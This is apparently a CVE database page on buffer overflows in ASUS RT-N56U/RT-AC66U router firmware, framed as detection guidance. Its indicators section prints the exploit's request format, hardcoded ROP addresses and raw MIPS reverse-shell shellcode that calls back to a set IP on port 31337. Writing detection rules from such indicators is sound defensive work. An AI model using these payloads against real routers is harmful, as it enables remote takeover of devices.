cbcvebase.
CVE-2013-6343
published 2014-01-22

CVE-2013-6343: Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary…

PriorityP262critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
9.71%
94.9th percentile
Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp.

Affected

3 ranges
VendorProductVersion rangeFixed in
asusrt-ac66u_firmware
asusrt-n56u_firmware
asustm-ac1900_firmware

Detection & IOCsextracted from sources · hover to see the quote

path/APP_Installation.asp
commandapps_action=install&apps_path=&apps_name=<payload>&apps_flag=sdb1
cookiehwaddr=<35-byte junk><200-byte MIPS reverse shell shellcode>
port31337
port443
bytes
\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09\x01
bytes
\x2c\x08\xbd\x27\x09\xf8\xa0\x03\x32\x41\x61
  • Detect HTTP POST requests to /APP_Installation.asp with an oversized apps_name parameter (>109 bytes) — the exploit uses 109 bytes of junk followed by ROP chain data.
  • Alert on HTTP POST to /APP_Installation.asp containing both apps_name and apps_flag parameters, especially with apps_flag=sdb1 and a large apps_name value.
  • Inspect the Cookie header for an hwaddr field with binary/non-printable content exceeding 35 bytes — the exploit embeds 200-byte MIPS shellcode in the hwaddr cookie value.
  • Monitor for outbound TCP connections to port 31337 from ASUS RT-N56U/RT-AC66U devices, which indicates successful reverse shell execution.
  • Fingerprint the target by checking for 'RT-N56U' in the HTTP server banner response to a HEAD / HTTP/1.1 request.
  • ·The exploit was tested specifically against firmware version 3.0.0.4.374_979; other firmware versions may also be vulnerable but were not confirmed.
  • ·The ROP chain uses hardcoded base addresses for ld_uClibc (0x2aaa8000) and libc (0x2ab5f000) in the httpd address space; these offsets are specific to the tested firmware and may differ on other builds.
  • ·The Stage 3 reverse shell shellcode hardcodes the callback IP 192.168.1.177 and port 31337; real-world attackers would modify these values.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.